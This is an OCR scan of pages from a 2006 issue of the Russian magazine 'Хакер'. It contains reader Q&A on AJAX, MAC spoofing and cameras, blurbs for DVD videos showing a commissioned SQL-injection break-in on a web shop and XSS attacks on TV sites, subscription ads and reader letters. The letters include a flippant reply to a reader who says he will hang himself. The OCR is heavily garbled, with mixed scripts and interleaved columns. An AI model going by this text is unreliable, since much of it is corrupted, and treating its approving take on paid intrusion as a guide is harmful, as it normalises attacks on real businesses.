на сервер, а он|в свою очередь, возвраща- 
ет только ту часть документа, на которую 
пришел запрос. ^Скрипт вносит изменения с 
и серийного номера карточки, далее прове- учетом полученной информации (без полной 
ряются точки продаж, покупатели ит. д. ит. п. перезагрузки 9 траницы). Использование 
В России это, конечно, мдпореапь но. но на АЗАХ стало наиболее популярно после того, 
Западе — вполне. как компания Ооодіе начала активно исгіоль- 

__І I лпвятк йгп при создании своих проектов, та- 

ких как (ЗтаіІ ( ѵѵѵѵѵѵ.дтаіІ.сот Т Ооодіе Марз 
( тарз.аооаіе.сот ). Огромное количество 
материала по этой технологии ты найдешь на 
сайте ИЦр://ги.ѵѵікіребіа.огд/ѵѵікі/АЦАХ . 



МАС-асІсІгезз 00-00-86-58-РР-РР 
Обнаруженный производитель: 
МЕОАНЕВТ2 СОРРОРАТЮІ4 
605 ІЧОВТН— 5600 ѴѴЕЗТ 
5АІ_Т І_АКЕ СІТУ ІЯ 841 1 6-3738 



МАС-адрес, правда, можно изменить (смотри 
программу ЗМАС), но не все об этом знают. 

О: Помнится, давно-давно у вас была 
статья о сервисе ѵѵѵѵѵу.сііскаіеі.сот. 
позволяющем отправлять аноним- 
ные $М8-со іщения. У него есть ана- 
логи? 

А: Аналогичный сервис, причем бесплатно, 



О: Почему на моем новом 6-мегапик- 
сельном фотоаппарате фотографии 
получаются хуже, чем на двухлетней 
цифре. Мегапикселей же намного 
больше! 

А: Ты должен понять одну важную вещь: коли- 
чество мегапикселей — это не самый важный 
показатель. Сейчасобъяснюпочему. Матрица 
современной фотокамеры — это что-то вро- 
де старой добрей пленки, представляющей 



предоставляет ѵѵѵѵѵѵТІнезтзгопе.сот . ГІраБ- собой небольшою микросхему, на которую 
да, список поддерживаемых операторов через объектив аппарата проецируется изо- 
здесь значительно скромнее, да и сервер бражение. Вся матрица состоит из небйоль- 



почему-то довольно часто отказывает. Но 
всё-таки он работает! 



ших датчиков. Имея миниатюрные размеры, 
они преобразовывают падающий на них свет 
в электрический сигнал. Собранная воедино 
информация от каждого датчика — и есть фо- 
тография. Чем больше физический размер 
пикселя, тем больше площадь, поглощаю- 




О: Вописании некоторых популярных 
и сложных скриптов нередко упоми- 
нается аббревиатура А^Х. Как я по- 
нял, это специальная технология для 
создания динамических страниц. Но 
в чем прикол, почему нельзя просто 
использовать РНР или РегІ? 

А: Содержание^ страниц, сгенерированных Чем больше пикселей размещено наматрице 
скриптами, действительно является дина- тем меньше их размер и тем плотнее они рас 
мическим, поскольку зависит от некотррых 
параметров (пускай даже названия раздела). 

Но не интерактивным! При переходе из одно- 
го раздела в другой посетителю приходится 
загружать все страницы заново, хотя (они, 
безусловно, имеют общую часть, которая не 
меняется. Разумно было бы отдавать гіоль- 
зователю только нужные ему данные и не 
перезагру жать страницу в ответ на кажд оо шины и ра зъема 
его действие. Этот принцип и заложен в АбАХ 
(АзупсИгопоиз баѵаЗсгір* апб ХМІ_) — новом 
подходе к построению интерактивных стра- 
ниц при помощи баѵаЗсгірі и ХМІ_. Модель 
Аіах выглядит следующим образом: пользо- 
ватель заходит на веб-страницу и нажимает 
на какой-нибудь ее элемент. Скрипт (на языке 



щая свет, и тем выше достоверность данных 
и ниже уровень шумов на снимке. Именно по- 
этому играютбол ышую роль не количество ме- 

I 

гапикселеи, а размеры пикселей и матрицы. 



положены. И еще: внимательно чит^й обзору, 
камер перед покупкой. 

О: На новых моделях ноутбуков поче- 
му-то нет РСМСІА-разъемов. Что за 
бред, ведь это же так удобно? 

А: Приятель, Р( МСІА — это уже прошлое. 
Теперь вовсю ис пользуется другой стандарт 
для подключения внешних 
устройств. Назьівается он ЕхргеззСагб и в 
настоящее врем=і имеет два форм-фактора: 
ЕхргеззСагб/34 и ЕхргеззСагб/54. Модули 
ЕхргеззСагсИобл адаютна40% менъетгши га- 
баритами по ера знению с РСМСІА и обеспе- 
чивают болышук скорость передачи данных 
(до 250 Мб/с). Су цественная разница. И-И 
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□ Взлома за деньги 

В этом ролике ты увидишь, как хакер выпол- 
няет заказ на взлом одного из крупных ин- 
тернет-магазинов. Взломщику необходимо 
получить доступ к базе данных интернет- 
магазина. Сначалахакер находит ЗОІ_-инъ- 
екцию в движке форума магазина, а затем 
грамотно эксплуатирует уязвимость. Он 
подбирает количество полей при помощи 
пиІІ, далее проверяет название таблицы с 
данными пользователей и сливает инфор- 
мацию себе на винт. 

Внимание! Все действия, описанные в ро- 
лике, противозаконны! (Да, поэтому даже 
не вставляй на 0\Ю в привод:). 

Автор: Отройков Леонид ака РОій 

(гОігіфт-эіІ.ги) 

□ Антитроянские штучки 

Итак, жизнь в сети полна опасностей и форс- 
мажорных обстоятельств. Никто не застра- 
хован отчервей, троянов и прочих маленьких 
«радостей». Последствия таких встреч тебя 



наверномалорадуют:). Нобедаещевтом, что 
черви не только засирают ехе-шники и наси- 
луют твой Аутпост с антивирусом, но еще и 
норовят «напомнить» какому-нибудь про- 
хвосту и тунеядцу пароль оттвоих приватных 
асек, ключей от ѴѴеЬтопеу (где естественно 
лежат деньги). Нас такой расклад в корне не 
устраивает. Чтобы не парить себе голову по 
этому поводу можно просто отучить некото- 
рые программы запоминать пароли:). К чему 
эта прелюдия? Да просто в свежем видео вы 
под чутким руководством крякера сможете 
извратиться над популярным ІМ-клиентом 
ОІР так, чтобы он не записывал пароли на- 
право и налево. Подробно описывать все 
действия и извращения в отладчике не имеет 
смысла: ты сам все узнаешь после просмот- 
ра. Комментарии — в помощь:) 

□ Тотальный разнос ТВ 

Жанр: Ужасы/Продолжительность: 19 

минут/Производство: ХАКЕР тадагіпе 

ргобисііоп/2006 год/Ограничение по воз- 
расту: 16+ 



Главной герой ленты — молодой человек, 
страдающий психическими расстройствами. 
Свой гнев на весь белый свет он выплески- 
вает в виртуальном мире в виде садистских 
надругательств над веб сайтами нескольких 
телевизионных компаний. На протяжении 
всего фильма хакер атакует три портала, на- 
ходя в них различные баги — от примитивной 
ХЗЗ до хитрой 50І_-инжекции. Парень звер- 
ски разделывается со своими жертвами, со- 
крушая сайт за сайтом. 

От кинокритика: Картина сильно впечат- 
ляет, особенно неискушенного зрителя. 
Профессиональная режиссура дает фору 
актерскому составу, который, как водится 
для импрессионистского кино, не очень си- 
лен. Хотя нужно отдать должное кровавым 
сценам: инъекция смотрится очень нату- 
рально. Звукооператор также может гор- 
диться своей работой. Зоипсіігаск к фильму 
— продвинутый транс. Ну что тут говорить? 
Еще один безусловный кино-хит от Хакер 
Ргосіисііопз. =Н= 
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Создай свой цифровой фотоархив на 

Ы1р:/ЛоІо.таіІ.гц/ и покажи друзьям! 

1. ДасГун и^ любой Іочки мири 

2. Удобная система аііьболтіі 
Редактирование фотографий 

4. возможность ограничение доступа только для друзой 

5 . Рейтинги лучших фотографий 

6 . Тоорчоскис конкурсы с призами 

Фото@таі1.гі/ 

Ваш личный цифровой фотоархив! 



Побывал в далеких странах? 
Накопилось много интересных 
фотографий? 





Если при нажатии 
на кнопку двигатель 
не завелся - срочно 
купите журнал 







СКА ПО ЦЕНЕ 11 НОМЕРОВ! 



1980 руб 



04 ДОЙ нйград* іій пйкупву журнала 
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ПЛЮС ПОДАРОК 

ОДИН ЖУРНАЛ 
ДРУГОЙ ТЕМАТИКИ 



& 






ОФОРМИВ ГОДОВУЮ ПОДПИСКУ В РЕДАКЦИИ, ВЫ МОЖЕТЕ 
БЕСПЛАТНО ПОЛУЧИТЬ ОДИН СВЕЖИЙ НОМЕР ЛЮБОГО ЖУР- 
НАЛА, ИЗДАВАЕМОГО КОМПАНИЕЙ «ГЕЙМ ЛЭНД»: 

• ЯНВАРСКИЙ НОМЕР — ПОДПИСАВШИСЬ ДО 30 НОЯБРЯ, 

• ФЕВРАЛЬСКИЙ НОМЕР— ПОДПИСАВШИСЬ 
ДО 31 ДЕКАБРЯ. 



ВПИШИТЕ В КУПОН НАЗВАНИЕ ВЫБРАННОГО ВАМИ ЖУРНАЛА 
ЧТОБЫ ЗАКАЗАТЬ ПОААРОЧНЫЙ НОМЕР 



И ЭЮ НЕ ВСЕ! 



31 ДЕКАБРЯ СРЕДИ ЧИТАТЕЛЕЙ, 
ОФОРМИВШИХ ПОДПИСКУ нД 
БУДЕТ РАЗЫГРАНО 200 МРЗ □ 



А* ; '.'лыі 



ВНИМАНИЕ! ВТОРОЕ СПЕЦПРЕДЛОЖ 



При подписке на комплект журналов 
ЖЕЛЕЗО РѴй + ХАКЕР 0Ѵ0+ ХАКЕР СПЕЦ СЭ: 

1 . годовая подписка по цене 1 1 номеров! - это 3 номера в подарок 

2. ДОПОЛНИТЕЛЬНО СКИДКА 10% на весь комплект 

3. плюс бесплатная подписка на любой журнал (дате)іапсі на 3 месяца! 



ЗА 12 МЕСЯЦЕВ 



РЕДАКЦИОННАЯ 

ПОДПИСКА 



С 1 ОКТЯБРЯ ПО 31 ДЕКАБРЯ ПРОВОДИТСЯ 
СПЕЦИАЛЬНАЯ АКЦИЯ ДЛЯ ЧИТАТЕЛЕЙ ЖУРНАЛА 












г 

‘Л 



ВЫГОДА и ГАРАНТИЯ и СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ внимание! 



ъ ъ . 
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1. Разборчиво заполните подписной купон и квитанцию, 
вырезав их из журнала, сделав ксерокопию или распе- 
чатав с сайта \ллллл/.дІс.ги. 

2. Оплатите подписку через Сбербанк . 

|3. Вышлите в редакцию копию подписных документов— 
купона и квитанции —любым из нижеперечисленных 
способов: 

по электронной почте $иЬ$сгіЬѳ@дІс.ги; 
по факсу 8 (495) 780-88-24; 
по адресу 119992, Москва, 
ул. Тимура Фрун , д. 11, стр. 44-45, 

ООО «Гейм Лэнд», отдел подписки. 




одписка оформляется в день обработки 
лона и квитанции в редакции: 

в течение пяти рабочих дней после отправки подписных 
документов в редакцию по факсу или электронной почте; 
в течение 20 рабочих дней после отправки подпис 
документов по почтовому адресу редакции. 

Рекомендуем использовать факс или электронную 
почту, в пос >д і случае предварительно отсканиро- 
вав или сфотографировав документы. 

Подписка оформляется с номера, выходящего через один 
календарный месяц после оплаты. Например, если вы произ- 
водите оплату в ноябре, то журнал будете получать с января. 



ПОДПИСКА НА ЖУРНАЛ «ХАКЕР» на 6 месяцев СТОИТ 1080 руб. ПОДАРОЧНЫЕ ЖУРНАЛЫ ПРИ ЭТОМ НЕ ВЫСЫЛАЮТСЯ 

ПО ВСЕМ ВОПРОСАМ СВЯЗАННЫМ С ПОДПИСКОЙ, ЗВОНИТЕ ПО БЕСПЛАТНЫМ ТЕЛЕФОНАМ 
8(495)780-88-29 (ДЛЯ МОСКВИЧЕЙ) И 8(800)200-3-999 (ДЛЯ ЖИТЕЛЕЙ ДРУГИХ РЕГИОНОВ РОССИИ, АБОНЕНТОВ СЕТЕЙ МТС, 
БИЛАЙН И МЕГАФОН). ВОПРОСЫ О ПОДПИСКЕ МОЖНО ТАКЖЕ НАПРАВЛЯТЬ ПО АДРЕСУ ІМРО@ОЮ.І?и ИЛИ ПРОЯСНИТЬ НА 

сайте ѵаш.ѳю.рі) ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ НА ЖУРНАЛ «Хакер» 




ОКТЯБРЬ ОКТЯБРЬ ОКТЯБРЬ иКТЯБРЬ УК I л • 




дгпрі <дтрі@стк.ги> 

Здравствуйте! Получили по подписке 
Ваш августовский номер журнала и хотим 
поинтересоваться, как извлечь с прила- 
гаемого диска дистрибутив ѴѴіпѴізІа. При 
открытии в ѴѴіпВАВ под ѴѴіпХР ЗР2 полу- 
чаем пустую папку стекстовым файлом, в 
котором речь и дет о формате файл овІЮР. 
Разъясните: пожайлуста технологию и не- 
обходимое для этого ПО для извлечения 
файлов. 

С уважением коллектив 23 ГМПИ МО РФ 
Санкт-Петербург 

Здравствуйте, уважаемый коллектив 
ГМПИ МО РФ! Весьма рад, что мне пишет 
не коллективов ДПС ГИБДД ЮЗАО, поэто- 
му спешу ответить — обратитесь к рубрике 
РАО этого же номера. В ней Степ клятвен- 
но пообещал мнеответитьнавсевашисамые 
интимные вопросы. Вообще, если вам в 
будущем будет хотеться сказать много, но 
совершенно не с кем будет поговорить — 
пишите Степу. У него нет запретных тем! 

С огромным уважением и искренним 
почтением. 



рЬі1<рЬі1@рогіги> 

Пойду вешаться. 

Здравствуйте! 

Я незнаю кому написать об этом. У меня рань- 
ше давно был почтовый ящик бѵѵагМООІ @ 
хакер. ш ... Он был привязан к моему игро 
вому онлайн аккаунту.. Игре я посвятил не- 
сколько лет. . А теперь. .Из-за реформ я по- 
терял его. . Что мне делать?Дело в том что на 
этот ящик должно прийти письмо с пинко- 
дом активации аккаунта. .Вообщем.. Пойду 
вешаться. 

Уважаемый Фил! Чтобы обсудить твою пе- 
чаль и разработать хоть какой-то способ 
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помочь тебе, мы собрались всей редакци- 
ей на внеочередное собрание. Как жить 
дальше? Как предотвратить неминуемую 
психологическую травму на всю жизнь, 
которая, как ты сам утверждаешь, может 
вылиться в суицидальную попытку? Мы 
нашли три способа. Первый — это изоб- 
рести машину времени, чтобы помочь 
тебе вернуться на...эээ...три года назад, 
когда почта на хакер. ру еще существова- 
ла ;). Правда, этот способ не годится, ведь 
тогда не было онлайн-РПГ. Второй способ 

— это обратиться за психологической по- 
мощью по телефону доверия Степа. Как я 
ужеговорил, специальнодлятаких, какты, 
он открыл телефон доверия, работоспо- 
собность которого обеспечивают горячие 
блондинки из Новомосковска. Обратись к 
ними сними груз с души! Третий же способ 

— переехать из Таллина в Москву, чтобы 
быть в самом центре компьютерных собы- 
тий, особенно таких, как закрытие люби- 
мой почты :). 

Игорь Хмиловский <ІКЬті1оѵгкіу@ѵег+ег.ги> 
Д оотавка "Хакера" Ио7 в Калининград. Часть 2 

Доброе утро! 

Веселуха, однако! 

1. Вчера в 9:31 по местному отправил пре- 
дыдущее письмо. 

2 . Сегодня в 8:45 принесли бандероль с не- 
доставленным «Хакером» Ыо7. 

3. Смотрю штемпели: Москва, отсылка 
19.07; Калининград (почтамт)- 

25.08 в 10 часов. 

4. Контрольные (предельные) сроки достав- 
ки — 7дней.Т.е. на сортировочную станцию 
у нас бандероль должна была оказаться 26 
июля... Где косяк? 

5. По Вашему анонсу «Хакер-Спец» N 08 вы- 
шел 2 августа, т.е. мне его должны были 
принести не позднее 10 -го числа (как и было 
раньше). Аналогично и по «Хакеру» N 08 - 
24-го. Жду... 



6 . Интересный прикол: в киосках «Прессы 
Россия» сегодня утром в продаже появил- 
ся «Хакер» N 08 , датированный поступле- 
нием в розницу 19-м числом. 

В связи с чем вопрос: если это «Почта Рос- 
сии» виновата, то как с ней совладать, и 
чем бы Вы в этом могли бы помочь (напри- | 

мер, документально)? 

Информация, ведь, ценна вовремя. 

Суважением, 

Хмиловский Игорь 

Проблема, я так думаю, во множественных 
разрывах пространственно-временного 
континиума. 

Такое бывает, если по почте перемещают- I 

ся квинтэссенции знаний в особо крупных 
размерах, просто-напросто временной 
барьер местами прерывается под натис- 
ком мощных и концентрированных Х-зна- 
ний, и получаются своеобразные локусы 
временных возмущений. В результате 
— всяческие аномалии, и среди них про- 
блемы с доставкой — отнюдь не самые 
злобные! Бывало, например, что через 
эти разрывы в здание почты проползали 
гигантские красные марсиане и набрасы- 
вались на почтальонш, размахивая гига- 
нтскими окровавленными тесакам. Или 
сами почтальоны вдруг сходили с ума, вы- 
хватывали из запасенного на случай атом- 
ной войны НЗ винтовки М-16 и выходили 
на большую дорогу (подробнее см. сюжет 
игры «Розіа1 1 »). 

Насчет своевременности же я с тобой 
полностью согласен, поскольку еще осно- 
ватель Московской Станции Скорой и Не- 
отложной помощи А. С. Пучков писал, что 
по-настоящему хороша только помощь, 
оказанная вовремя. Но подумай, если наш 
журнал настолько крут, что способен нело- 
кальные возмущения пространства — разве 
не стоит его чуть подождать? :). А если се- 
рьезно — твой вопрос мы передали Ники- 
тосу, разберемся. =НІ 





ВОПРОСЫ по тематике ЖУРНАЛА? 

ПИШИ НА 






АІІЧТВАЫ. ** 
>ЕАТНМАТСН 



ОАТЕ: 29 октября 2006 года 



ЬОСАТІОЫ: д. Костино, пейнтбол-клуб «Г вардия 



ЕѴЕІМТ: Пейнтбольные бои с читателями, 20 на 20 



ОЕ8СПІРТІОЫ: Приезжай на нашу тусовку и расстреляй редакцию Хакера. 



ВСЕ ПОДРОБНОСТИ - НА ФОРУМЕ РОВЦМ.ХАКЕР.ВІ) С 1 5 ОКТЯБРЯ 




Касса, 
машинист, 
дежурный 
по эскалатору — 
справок не дают, 
все вопросы 
к Яндексу. 



ѵѵѵѵѵѵ.уапсіех.ги 



Прорыв года! 

Компьютер марки <ІЧТ> АгіѵаМТ АСЕ 
на базе процессора ІпіеР' Соге™ 2 Оио. 
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Два ядра, 
Делай больше. 



чтиг-пі-.гіі 



ІпІеІ®Соге м 2 0ш 

Процессор, опередивший время 

На А0% быстрее, на А 0% экономичнее* 



ІѴГ 



сотри Гег 



Компьютеры марин можно приобрести ё 
Федеральной сети компьютер ных центров Р0І-А.НІ5 
и у наших региональных дилеров: ѵт'тѵ.іті.ги 
юл.: ( 495 } 363 9393 



Ні -ТТіПТіі рСГ.Гг* г 




X 



о 



9; 

> 



о 

ст> 



в 




